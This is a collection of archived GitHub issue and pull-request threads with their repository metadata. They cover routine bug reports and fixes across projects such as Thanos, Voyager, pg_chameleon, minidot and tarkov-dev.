This doesn't seem to cause any other issues... just a noisy error in the logs. The context is always related to "ipfs.metrics.scope":
Actually, this is happening becuase I'm using the HashOnly setting when adding data at one point during the sync process. This causes this mock repo to be constructed: https://github.com/ipfs/go-ipfs/blob/master/core/coreapi/unixfs.go#L64. When it's no longer needed, I'm guessing Close is called on it, which returns this TODO err to the mock node's error channel.
Still harmless, just good to know the actual cause. We should probably PR to go-ipfs a change that either removes the error or otherwise makes it more obvious to users who just want to use the hash only option of add.
|
gharchive/issue
| 2019-05-30T16:41:23 |
2025-04-01T04:36:03.901828
|
{
"authors": [
"sanderpick"
],
"repo": "textileio/go-textile",
"url": "https://github.com/textileio/go-textile/issues/800",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
830361479
|
Pow 2.3.1
Updates to the new Powergate release 2.3.1, adding miner index and "deals since" APIs. Updates all out of data dependencies (except for the ipfs http client cc @carsonfarmer... tried and had all sorts of typescript errors).
cc @jsign just as an FYI.
|
gharchive/pull-request
| 2021-03-12T18:48:54 |
2025-04-01T04:36:03.903153
|
{
"authors": [
"asutula"
],
"repo": "textileio/js-powergate-client",
"url": "https://github.com/textileio/js-powergate-client/pull/368",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1678443124
|
Page - divider of verses
#334
@Valyukhov
|
gharchive/pull-request
| 2023-04-21T12:28:26 |
2025-04-01T04:36:03.940403
|
{
"authors": [
"foxprogs"
],
"repo": "texttree/v-cana",
"url": "https://github.com/texttree/v-cana/pull/343",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2752496497
|
add documentation for using the exporter in a docker environment
📋 Changes
🧪 Testing
📚 References
Thank you for your contribution!
|
gharchive/pull-request
| 2024-12-20T11:01:56 |
2025-04-01T04:36:03.945227
|
{
"authors": [
"Mbaoma",
"tfadeyi"
],
"repo": "tfadeyi/auth0-simple-exporter",
"url": "https://github.com/tfadeyi/auth0-simple-exporter/pull/235",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1260856477
|
Define a repo for rules
Dont reinvent the wheel...
...and let users contribute their rules to a separate repo / website.
Solution
Define some rules (naming, file endings, utf-8, etc. pp)
Gather some volunteers to check for malitious code.
Create a website with search ,filters and ratings
Profit ;D
Possible match in your Roadmap https://github.com/tfeldmann/organize/projects/4#card-25088440
Good idea. Creating a website for this is a bit too much but a folder with some predefined rules would certainly be useful and could live in this repository. Goes on the todo list.
I'm having a hard time defining what these predefined rules might look like. Maybe something like snippets?
description: "Filters images containing GPS information"
type: "filter"
---
- exif: gps.gpsdate
description: "Recursively delete all empty directories"
type: "rule"
---
rules:
- locations: "__placeholder__"
targets: dirs
subfolders: true
filters:
- empty
actions:
- delete
Any good ideas?
I haven't fully thought this through, but one idea might be to allow these standalone rules to be 'include'd into the main config, and you pass any required variables to it
So your generic 'blueprint' might be defined as..
description: "Recursively delete all empty directories"
type: "blueprint"
---
rules:
- locations: "{{ vars.dir }}"
targets: dirs
subfolders: true
filters:
- empty
actions:
- delete
and then you include the blueprint from your main config like...
description: "Recursively delete all empty directories"
type: "rule"
include:
file: blueprints/recursively_delete.yml
vars:
- dir: ~/Desktop/some_dir
It could then generate an error if vars.dir was not defined
|
gharchive/issue
| 2022-06-04T17:55:06 |
2025-04-01T04:36:03.953503
|
{
"authors": [
"carpii",
"rafo",
"tfeldmann"
],
"repo": "tfeldmann/organize",
"url": "https://github.com/tfeldmann/organize/issues/217",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
378313060
|
fixed a bug where an empty rules file did not result in the proper error message
fixed a bug where an empty rules file did not result in the proper error message
Thank you!
|
gharchive/pull-request
| 2018-11-07T14:33:08 |
2025-04-01T04:36:03.954850
|
{
"authors": [
"mope1",
"tfeldmann"
],
"repo": "tfeldmann/organize",
"url": "https://github.com/tfeldmann/organize/pull/20",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1974079903
|
TBLFM from formulas.md not working :open_mouth:
using example from here:
https://github.com/tgrosinger/md-advanced-tables/blob/main/docs/formulas.md
it's not working at all. in any of those view modes.
obsidian 1.4.16
advanced tables 0.19.1
plugins:
[
"obsidian-advanced-uri",
"auto-classifier",
"auto-glossary",
"canvas-filter",
"obsidian-checklist-plugin",
"code-styler",
"copilot",
"obsidian-custom-frames",
"dataview",
"obsidian-day-planner",
"obsidian-dictionary-plugin",
"cm-editor-syntax-highlight-obsidian",
"obsidian-find-and-replace-in-selection",
"obsidian-full-calendar",
"homepage",
"obsidian-kanban",
"obsidian-linter",
"mermaid-tools",
"obsidian-mind-map",
"nldates-obsidian",
"oz-image-plugin",
"periodic-notes",
"obsidian-read-it-later",
"obsidian-reminder-plugin",
"obsidian-rollover-daily-todos",
"tag-wrangler",
"obsidian-tagfolder",
"obsidian-tasks-plugin",
"obsidian-version-history-diff",
"obsidian-task-archiver",
"obsidian-pandoc",
"obsidian-regex-replace",
"quickadd",
"omnisearch",
"obsidian-auto-link-title",
"obisidian-note-linker",
"obsidian-latex",
"obsidian-emoji-toolbar",
"dbfolder",
"table-editor-obsidian"
]
[
"file-explorer",
"global-search",
"switcher",
"graph",
"backlink",
"canvas",
"outgoing-link",
"tag-pane",
"page-preview",
"templates",
"note-composer",
"command-palette",
"editor-status",
"bookmarks",
"outline",
"word-count",
"file-recovery",
"sync"
]
moved to https://github.com/tgrosinger/advanced-tables-obsidian/issues/299
|
gharchive/issue
| 2023-11-02T11:47:38 |
2025-04-01T04:36:03.997420
|
{
"authors": [
"axaluss"
],
"repo": "tgrosinger/md-advanced-tables",
"url": "https://github.com/tgrosinger/md-advanced-tables/issues/71",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
183516646
|
Fixing Travis to Allow plotting
Currently Travis is not configured to allow plotting via matplotlib and seaborn. Let's fix that.
I have found some resources that may be helpful:
matplotlib + travis
no display name error
closing with pull#23.
|
gharchive/issue
| 2016-10-17T20:19:02 |
2025-04-01T04:36:04.001313
|
{
"authors": [
"charlesdrotar"
],
"repo": "tgsmith61591/skutil",
"url": "https://github.com/tgsmith61591/skutil/issues/22",
"license": "bsd-3-clause",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1124035468
|
Link to documentation is wrong
The link to the documentation in the README.md file is wrong:
https://github.com/tguichaoua/promised-sqlite3/blob/befca59abd9f3a927aff4dc69736089c0aa040c9/README.md?plain=1#L61
I'm guessing the link should be:
https://tguichaoua.github.io/promised-sqlite3/
However, I didn't find what I was looking for there neither. After having inserted a new post, I would like to retrieve the id the new post got. The docs says that run() returns a RunResult, but there's no documentation of what a RunResult is. But looking at the implementation, I can see it's this so I'm guessing I can use runResult.lastID to obtain the id the post got. Maybe this can be clarified?
Otherwise this library seem to be precisely what I was looking for. Thank you!
The links may be broken since it's a pretty old project. Also I don't have time to maintain this project.
But you can open an PR to fix issues and I will publish a new release.
About the documentation, since this project is build on top of sqlite3, I did not want to re-write the documentation from sqlite3, so I just put a link. Also, if you think the documentation must be clarified, open a PR.
The RunResult is describe here:
If execution was successful, the this object will contain two properties named lastID and changes which contain the value of the last inserted row ID and the number of rows affected by this query respectively. Note that lastID only contains valid information when the query was a successfully completed INSERT statement and changes only contains valid information when the query was a successfully completed UPDATE or DELETE statement. In all other cases, the content of these properties is inaccurate and should not be used. The .run() function is the only query method that sets these two values; all other query methods such as .all() or .get() don't retrieve these values.
|
gharchive/issue
| 2022-02-04T10:21:45 |
2025-04-01T04:36:04.123206
|
{
"authors": [
"PeppeL-G",
"tguichaoua"
],
"repo": "tguichaoua/promised-sqlite3",
"url": "https://github.com/tguichaoua/promised-sqlite3/issues/12",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
333754131
|
Error upon Running Minidot
Hello, I recently discovered minidot, and it seems like a very useful program. I am snagging an issue however. Whenever I run it I get the following error.
Loading required package: proto
[12:43:19] /home/pabster212/data/Programs/minimap2/minimap2 .. ok
[12:43:19] samtools .. ok
[12:43:19] prepping .. done
[12:45:00] mode: fast (2242694751 bp) "-L 500 -c 15"
[12:45:00] mapping .. failed
[ERROR] failed to open file '500'
[ERROR] failed to open file '500'
Any idea what this error could be? The command executed was ~/data/Programs/minidot/bin/minidot -M ~/data/Programs/minimap2/minimap2 -o test222.pdf A10.spades.contigs.fa ref.fa .
Hi @Jome0169 I came across a similar problem. I see that you are using minimap2 (not minimap - which is no longer developed). However, the default parameters added to the call to minimap by minidot internally (-L 500 -c 15) do not make sense for minimap2, -L has a totally different meaning now and does not take an argument. That is why minimap2 considers the 500 as a file name. So I see two possible solutions:
Use minimap
Use the -m option to provide parameters that work with minimap2
@iimog is right. minidot works with minimap, not minimap2. I haven't had the time yet to port it... It should however, be possible to use the -m parameter to manually specify your minimap2 optionsand overwrite minidot's defaults, which don't make sense with minimap2 ...
|
gharchive/issue
| 2018-06-19T16:47:15 |
2025-04-01T04:36:04.127629
|
{
"authors": [
"Jome0169",
"iimog",
"thackl"
],
"repo": "thackl/minidot",
"url": "https://github.com/thackl/minidot/issues/10",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
183290996
|
Backporting some useful changes from the iOS branch
As part of creating the new 'fat' policy manager I needed some features from the iOS branch such as a wifi layer that used generations, an updated platform class, etc. I wanted to get these reviewed separately from the rest of the changes in thaliproject/Thali_CordovaPlugin#1274 to make for a less overwhelming code review.
This is just too much disruption to be worth moving back.
|
gharchive/issue
| 2016-10-16T20:54:20 |
2025-04-01T04:36:04.133294
|
{
"authors": [
"yaronyg"
],
"repo": "thaliproject/Thali_CordovaPlugin",
"url": "https://github.com/thaliproject/Thali_CordovaPlugin/issues/1331",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
496264213
|
Store: error parsing block
Thanos version used
thanos, version 0.7.0 (branch: HEAD, revision: c6eaf68bec32aefd280318eaef6121d6ddb20d10) build user: root@aa355daaf987 build date: 20190902-15:31:30 go version: go1.12.5
What happened
Thanos store couldn't present all the data we were expecting as we have months of data and only one day was being shown. After looking at the logs all our thanos store instances were showing an error when trying to read the meta.json file from some folders in the data directory. After inspecting the folders we confirmed that they were empty.
After the clean up of the empty folders store returned to its normal behaviour.
What you expected to happen
The folders should not be empty so some process must have failed and the folders were not cleaned up. Also, thanos probably should keep reading the folders until a new healthy one is found so the query would be correctly precessed.
How to reproduce it (as minimally and precisely as possible):
Couldn't reproduce the problem
Full logs to relevant components
level=warn ts=2019-09-20T09:53:44.795446173Z caller=bucket.go:325 msg="error parsing block range" block=01DN3WMQJ1EQM192SSTXSBPS4V err="read meta.json: open /mnt/prometheus/store/01DN3WMQJ1EQM192SSTXSBPS4V/meta.json: no such file or directory"
Anything else we need to know
We use azure blob storage with thanos.
We use store in our prd environment with thanos 0.6.0 and the problem hasn't happened.
thanos: uname -a
Linux thanos 3.10.0-957.12.1.el7.x86_64 #1 SMP Mon Apr 29 14:59:59 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Hello, seems like it was fixed by this: https://github.com/thanos-io/thanos/pull/1505. Please try out the newest (master) version! Shout loudly at me if it happens again with that commit.
Tested with the newest version and it seems to be solved! Thanks 😄
Yes, we are running it in production and the issue does not happen anymore.
Thanks for verifying!
|
gharchive/issue
| 2019-09-20T10:03:41 |
2025-04-01T04:36:04.141731
|
{
"authors": [
"FUSAKLA",
"GiedriusS",
"joaosilva15"
],
"repo": "thanos-io/thanos",
"url": "https://github.com/thanos-io/thanos/issues/1549",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
553468071
|
Use latest golang 1.13 docker image available
[ ] I added CHANGELOG entry for this change.
[ ] Change is not relevant to the end user.
I just deployed the new 0.12.0 and noticed the following:
Version: 0.12.0
GoVersion: go1.13.1
Did this PR miss something or is this intended?
@der-eismann very good catch, this is because of inconsistent usage of the CI images. Fix in https://github.com/thanos-io/thanos/pull/2440
|
gharchive/pull-request
| 2020-01-22T11:06:28 |
2025-04-01T04:36:04.144096
|
{
"authors": [
"der-eismann",
"squat",
"sylr"
],
"repo": "thanos-io/thanos",
"url": "https://github.com/thanos-io/thanos/pull/2025",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
807049205
|
stalebot: Add an exempt label to ignore issue that has a PR
This PR adds an exempt label to stalebot to ignore the issue with active PRs.
To mark the issue that has an active PR, maintainers should add a specific label: state: someone-working-on-it
The idea triggered in https://github.com/thanos-io/thanos/issues/3456
What do you think?
Those are all valid points. And I don't have the answers now. I need to spare some time on this and check what are the available options. Maybe we have a smarter stalebot? Or we can try to improve it on the upstream.
Now there is no better plan. But I agree it would be really good if we can automate this. For now, I would say let's try it!
|
gharchive/pull-request
| 2021-02-12T08:34:58 |
2025-04-01T04:36:04.146635
|
{
"authors": [
"kakkoyun",
"yeya24"
],
"repo": "thanos-io/thanos",
"url": "https://github.com/thanos-io/thanos/pull/3789",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
53594790
|
Update to task-closure-tools 0.1.9
Tests pass
task-closure-tools 0.1.9 addresses empty src bug from
https://github.com/thanpolas/grunt-closure-tools/issues/67
Things seem to still compile well.
released 0.9.8 :8ball: @betaorbust thanks!
|
gharchive/pull-request
| 2015-01-07T03:50:12 |
2025-04-01T04:36:04.148822
|
{
"authors": [
"betaorbust",
"thanpolas"
],
"repo": "thanpolas/grunt-closure-tools",
"url": "https://github.com/thanpolas/grunt-closure-tools/pull/68",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
190554781
|
FIX - env function call in routes.php
Hello,
I propose not to use env() in routes but config().
There is a reason for the madness.
#106
Yeah, i understand in local but if you don't use the .env file in production, all is broken :'(
My use case : i put .env in production first time, i execute artisan config:cache then i delete the .env file.
I agree that the current solution does not work perfectly, but neither does this one.
I however can not figure out what a perfect solution would look like.
I myself would prefer a try-catch instead of this.
Or like this :
env('DB_CONNECTION', config('database.default'))
The thing that #106 tries to do, is to only run the database call in routes if the system have been installed. However this is the case when env('DB_CONNECTION') is not null. However doing the using config('database.default') will never return null, not even when Voyager have not been installed.
Closing, however still looking for another to handle this.
|
gharchive/pull-request
| 2016-11-20T12:12:32 |
2025-04-01T04:36:04.164243
|
{
"authors": [
"InfinityWebMe",
"marktopper"
],
"repo": "the-control-group/voyager",
"url": "https://github.com/the-control-group/voyager/pull/185",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
394019591
|
Remove unnecessary relationship-code
Method getRelationships in BreadRelationshipParse and the whole HasRelationship Trait relies on relationship-method-names which we dont use/know.
Therefore it is not usable/useful and I removed it completely.
Because of that relationToLink() doesn't do anything also and I removed everything related to it.
Sideeffect: $with in models is working again.
Fixes https://github.com/the-control-group/voyager/issues/3604 and fixes https://github.com/the-control-group/voyager/issues/2561
$with in models is working again.
Can anybody explain ?
@emptynick I think this is just code clean up. This PR just remove all the remaining code related to relationship with the use of Eager loading capabilities, which was not working (which had been deprecated i guess).
As I had stated it the comment is the issue:
https://github.com/the-control-group/voyager/issues/3604#issuecomment-427711651
"We have data in $item->type as 'relationship', but in $details->type we have value as 'belongsTo'."
This PR removes feature related to eager loading of the relation once and for all.
@DrudgeRajen "$with in Model" will not work for sure, Since we don't have any relationship defined on Model level and cant be eager loaded in any was possible.
@emptynick I think this is just code clean up. This PR just remove all the remaining code related to the relationship with the use of Eager loading capabilities, which was not working (which had been deprecated i guess).
As I had stated it the comment is the issue:
https://github.com/the-control-group/voyager/issues/3604#issuecomment-427711651
"We have data in $item->type as 'relationship', but in $details->type we have value as 'belongsTo'."
This PR removes feature related to eager loading of the relationship once and for all.
@DrudgeRajen "$with in Model" will not work for sure, Since we don't have any relationship defined on the Model level and cant be eager loaded in any way possible.
This PR removes feature related to eager loading of the relationship once and for all.
Because all those features solely rely on relationship-method names. So it can't and will never work with the way we currently define relationships. Why keep it then?!
@DrudgeRajen "$with in Model" will not work for sure, Since we don't have any relationship defined on the Model level and cant be Eager loaded in any way possible.
If you define $with in your model it will work again. I can guarantee you that.
See issue #2561
@emptynick I understand $with will work but what if dev will not keep protected $with=['methodname'] ? Eager Load will not work ? I think the method that are removed were somehow handling these things, might be in older version.
$with is a feature of Laravel/Eloquent.
And because we query relationships directly through the foreign model (not through the method) we don't need to eager-load the relationship before.
|
gharchive/pull-request
| 2018-12-25T13:15:16 |
2025-04-01T04:36:04.172909
|
{
"authors": [
"DrudgeRajen",
"abhinav-rabbit",
"emptynick",
"ntuple"
],
"repo": "the-control-group/voyager",
"url": "https://github.com/the-control-group/voyager/pull/3836",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1475311297
|
Ammo Graph Not Updating Based on Toggles
Describe the Issue
When using the "new" ammo chart toggles to hide/show ammo based on availability, the chart updates to hide some ammo, but the graph does not.
The "total damage" toggle affects the graph properly, so I would expect the "ignore settings" toggle to be the same
Expected Behavior
Expected that if "ignore settings" is off, unavailable ammo would be hidden on the above graph.
To Reproduce
Set low traders or turn off flea and toggle "ignore settings" on/off
Client
Desktop
Browser
Chrome
Relevant Console Log Output
No response
Extra Information
No response
I see this somewhat differently. Even if ammo is "unavailable" because you can't buy it directly from traders or craft it, it's still possible that you might find that ammo in raid and want to know its attributes.
I see this somewhat differently. Even if ammo is "unavailable" because you can't buy it directly from traders or craft it, it's still possible that you might find that ammo in raid and want to know its attributes.
As long as we have the "Ignore settings" toggle, I think that accounts for that use case.
My main want is, as a relatively shitty Tarkov player myself, am interested in figuring out, "At my current trader level, what's my best bang-for-buck ammo type?"
So, my 'desired' search would be the ability to filter the chart & list down to ammo that is purchasable by me at my current trade/flea unlock level, and then filter further by price so I can see what the available damage vs pen options available to me look like.
The pen range slider that was added is super helpful too, but that would probably be the 2nd or 3rd step I'd want to narrow down to the ammo type I'm looking to find a weapon and fill with it.
Can't that basically be achieved by sorting by cheapest price (ascending) and filtering by minimum penetration? Anything without a price sinks to the bottom of the list.
For the list at the bottom, that works well if I've already picked a caliber, or if I've set the upper/lower limit on pen relatively narrow.
But if I'm trying to also visually identify the range of pen vs damage across multiple calibers, it can get pretty cluttered.
To clarify though, this is also specifically about the graph updating, not the list at the bottom, where the only filters that affect it are the pen slider and caliber selector.
Fair enough. I'm not opposed to the feature if someone wants to code it and submit a PR.
@Reithan does this solve the issue? I made it so it just affects the graph, and only shows what you can buy with your traders.
@brjens The new "Trader Ammo" toggle is working with the graph as I wanted, although the "Ignore Settings" toggle still seems to be working oddly? I don't see anything changing on the graph whether "Trader Ammo" is on or off.
|
gharchive/issue
| 2022-12-04T23:46:56 |
2025-04-01T04:36:04.205103
|
{
"authors": [
"Razzmatazzz",
"Reithan",
"brjens"
],
"repo": "the-hideout/tarkov-dev",
"url": "https://github.com/the-hideout/tarkov-dev/issues/278",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2340910979
|
Show all trader offers per level
Includes barters in trader offers shown per level on the trader pages.
.deploy
|
gharchive/pull-request
| 2024-06-07T17:48:44 |
2025-04-01T04:36:04.206167
|
{
"authors": [
"Razzmatazzz"
],
"repo": "the-hideout/tarkov-dev",
"url": "https://github.com/the-hideout/tarkov-dev/pull/947",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
706139534
|
Created the about.js file displaying the info of the bot
Right now, it would work something like this.
@Chronos about
or
+about
So we still have to make it display the about result only by pinging. So I will work on that sometime soon. Pull requested anyway.
I think as discussed on discord, making the embed a bit cleaner like
would be preferred.
Along with responding on just a mention, you may have to use an event to do this
https://discord.js.org/#/docs/main/stable/class/Client?scrollTo=e-message
If what you want is a the profile picture thumbnail in the the embed, I can do it.
There's a few very minor things that would improve the looks of this greatly
Inline fields for prefix, contributors, uptime and ping
can be done with
{name: "**Prefix**", value: `${this.handler.prefix}`, inline: true},
Adding the profile picture thumbnail is perfect too, I've just noticed but it seems you've deleted the .env.example file too. Perhaps by mistake
Okay I'll work on that.
Also, I apologize about the .env.example. I think we can close this PR and I'll open a new updates one. That okay?
That works for me, one extra thing I think would help out with looks is to style the build info text, should be able to do it with something like
{name: "**Build info**", value: "```fix\nVersion: 0.0.0\nDiscord.js: v12.3.1\nDiscord Akairo: v8.2.0```"},
No worries about the .env.example - easy enough mistake to make
It looks like this now. Thanks for the suggestions, it looks much cleaner now.
Missed a few other things mentioned on the Discord channel, so here they are updates as well.
Looking great!
Closing PR because I'm creating a new updated one.
|
gharchive/pull-request
| 2020-09-22T07:19:39 |
2025-04-01T04:36:04.219617
|
{
"authors": [
"DracTheDino",
"Moe-Szyslak"
],
"repo": "the-programmers-hangout/Chronos",
"url": "https://github.com/the-programmers-hangout/Chronos/pull/11",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1150972887
|
MySQL read daemon fails with decoding error
Describe the bug
When following the example usage from the documentation, when running chameleon start_replica, the program will fail with LookupError: unknown encoding: utf8mb3 (Full log attached below).
To Reproduce
Run MariaDB and PostgreSQL containers using the Docker Compose
Create a table and insert rows in MariaDB
Follow the usage example
Expected behavior
The replication starts successfully.
Environment(please complete the following information):
OS: NixOS + Docker
MySQL Version: 10.6.5-MariaDB-1:10.6.5+maria~focal-log
PostgreSQL Version: 13.6
Python Version: 3.9.6
Additional context
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess INFO global_lib.py (617): Checking if the replica for source mysql is stopped
2022-02-26 00:26:14 MainProcess INFO global_lib.py (627): Cleaning not processed batches for source mysql
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (3239): Cleaning table t_log_replica_mysql_1
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (3239): Cleaning table t_log_replica_mysql_2
2022-02-26 00:26:14 MainProcess INFO global_lib.py (558): Starting the replica daemons for source mysql
2022-02-26 00:26:14 MainProcess DEBUG global_lib.py (567): Replica process for source mysql is running
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 read_replica DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 replay_replica DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (1277): Cleaning replayed batches for source mysql older than 1 day
2022-02-26 00:26:14 read_replica DEBUG pg_lib.py (680): There is already a database connection active.
2022-02-26 00:26:14 read_replica DEBUG pg_lib.py (3111): Collecting schema mappings for source mysql
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1463): Batch data [(12, 'mysql-bin.000003', 469495347, 't_log_replica_mysql_1', None)]
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1011): collecting table type map
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1228): GTID DISABLED - log_file mysql-bin.000003, log_position 469495347. id_batch: 12
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1242): ROTATE EVENT - binlogfile mysql-bin.000003, position 469495347.
2022-02-26 00:26:15 MainProcess ERROR global_lib.py (571): Read process alive: False - Replay process alive: True
2022-02-26 00:26:15 MainProcess ERROR global_lib.py (572): Stack trace: Traceback (most recent call last):
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pg_chameleon/lib/global_lib.py", line 500, in read_replica
self.mysql_source.read_replica()
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pg_chameleon/lib/mysql_lib.py", line 1464, in read_replica
replica_data=self.__read_replica_stream(batch_data)
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pg_chameleon/lib/mysql_lib.py", line 1322, in __read_replica_stream
for row in binlogevent.rows:
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 443, in rows
self._fetch_rows()
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 438, in _fetch_rows
self.__rows.append(self._fetch_one_row())
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 491, in _fetch_one_row
row["values"] = self._read_column_data(self.columns_present_bitmap)
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 138, in _read_column_data
values[name] = self.__read_string(2, column)
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 234, in __read_string
string = string.decode(encoding)
LookupError: unknown encoding: utf8mb3
2022-02-26 00:26:15 MainProcess ERROR global_lib.py (578): Read daemon crashed. Terminating the replay daemon.
2022-02-26 00:26:15 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:15 MainProcess INFO global_lib.py (603): Replica process for source mysql ended
# Docker Compose
version: '3'
services:
postgres:
image: postgres:13
volumes:
- ./postgres:/var/lib/postgresql/data
environment:
POSTGRES_DB: dbname
POSTGRES_PASSWORD: password
POSTGRES_USER: user
restart: always
ports:
- "5432:5432"
mysql:
image: mariadb
volumes:
- ./mysql:/var/lib/mysql
- ./mysql-config:/etc/mysql/conf.d
environment:
MYSQL_ROOT_PASSWORD: toor
MYSQL_DATABASE: dbname
MYSQL_USER: user
MYSQL_PASSWORD: password
MYSQL_ALLOW_EMPTY_PASSWORD: "yes"
restart: always
ports:
- "3306:3306"
[mariadbd]
binlog_format = ROW
binlog_row_image = full
log-bin = mysql-bin
server-id = 1
expire_logs_days = 10
---
# global settings
pid_dir: ~/.pg_chameleon/pid/
log_dir: ~/.pg_chameleon/logs/
log_dest: file
log_level: info
log_days_keep: 10
rollbar_key: ''
rollbar_env: ''
# type_override allows the user to override the default type conversion
# into a different one.
type_override:
'tinyint(1)':
override_to: boolean
override_tables:
- '*'
# postgres destination connection
pg_conn:
host: localhost
port: 5432
user: user
password: password
database: dbname
charset: utf8
sources:
mysql:
type: mysql
db_conn:
host: localhost
port: 3306
user: user
password: password
charset: utf8
connect_timeout: 10
schema_mappings:
dbname: archive_wp
limit_tables: []
skip_tables: []
grant_select_to: []
lock_timeout: 120s
my_server_id: 1
replica_batch_size: 10000
replay_max_rows: 10000
batch_retention: 1 day
copy_max_memory: 300M
copy_mode: file
out_dir: /tmp
sleep_loop: 1
on_error_replay: continue
on_error_read: continue
auto_maintenance: disabled
gtid_enable: false
skip_events:
insert: []
delete: []
update: []
keep_existing_schema: true
MariaDB [(none)]> show variables like 'char%'; show variables like 'collation%';
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | utf8mb3 |
| character_set_connection | utf8mb3 |
| character_set_database | utf8mb4 |
| character_set_filesystem | binary |
| character_set_results | utf8mb3 |
| character_set_server | utf8mb4 |
| character_set_system | utf8mb3 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.001 sec)
+----------------------+--------------------+
| Variable_name | Value |
+----------------------+--------------------+
| collation_connection | utf8mb3_general_ci |
| collation_database | utf8mb4_unicode_ci |
| collation_server | utf8mb4_unicode_ci |
+----------------------+--------------------+
3 rows in set (0.000 sec)
It works with mysql instead of mariadb, disregard :)
|
gharchive/issue
| 2022-02-25T23:45:14 |
2025-04-01T04:36:04.237612
|
{
"authors": [
"ldesgoui"
],
"repo": "the4thdoctor/pg_chameleon",
"url": "https://github.com/the4thdoctor/pg_chameleon/issues/141",
"license": "bsd-2-clause",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1093060352
|
Miss Yunjin cover
https://ys.mihoyo.com/main/character/liyue?char=15
fixed
|
gharchive/issue
| 2022-01-04T06:48:05 |
2025-04-01T04:36:04.244534
|
{
"authors": [
"NepPure",
"theBowja"
],
"repo": "theBowja/genshin-db",
"url": "https://github.com/theBowja/genshin-db/issues/73",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1922584672
|
ValorantStats using Valorant API
Hello everything is fine? I would like to create an example of using APIs with Python, and to show my love for the game.
I hope you accept and consider it for hacktoberfest.
Ok @jonascarvalh. Go ahead.
#114 All done ✅
The project was reviewed and merged. Thank you @jonascarvalh
Feel free to star this repo and add more projects.
Starred 🌟
|
gharchive/issue
| 2023-10-02T19:58:26 |
2025-04-01T04:36:04.259831
|
{
"authors": [
"jonascarvalh",
"theadeyemiolayinka"
],
"repo": "theadeyemiolayinka/python-scripts",
"url": "https://github.com/theadeyemiolayinka/python-scripts/issues/113",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1007379391
|
希望命令行中增加clear指令
好的, 目前你可以使用 Cmd-K 或按垃圾桶按钮。
好的,谢谢,希望软件越来越好。
|
gharchive/issue
| 2021-09-26T12:35:02 |
2025-04-01T04:36:04.278396
|
{
"authors": [
"Veloma-Timer",
"bummoblizard"
],
"repo": "thebaselab/codeapp",
"url": "https://github.com/thebaselab/codeapp/issues/250",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
230304239
|
Shrio Tags not working
All the shrio tags don't seem to work.
I'm using the thymeleaf layout dialect and the shiro dialect.
<th:block th:if="${T(at.pollux.thymeleaf.shiro.processor.ShiroFacade).isUser()}"> works
I checked this issue and I wish @saviola777 shared what his final solution or mistake was.
I really don't want to use the th:if syntax.
Help!
I forgot to add the ShiroDialect to the template engine, e.g.
@Bean
@Autowired
public SpringTemplateEngine templateEngine(ITemplateResolver templateResolver) {
SpringTemplateEngine engine = new SpringTemplateEngine();
engine.setTemplateResolver(templateResolver);
// Enable shiro dialect for thymeleaf
engine.addDialect(new ShiroDialect());
return engine;
}
in a @Configuration class.
Looks like i did the same thing, I didn't have to add the other dialects . I completely forgot!
Thanks!
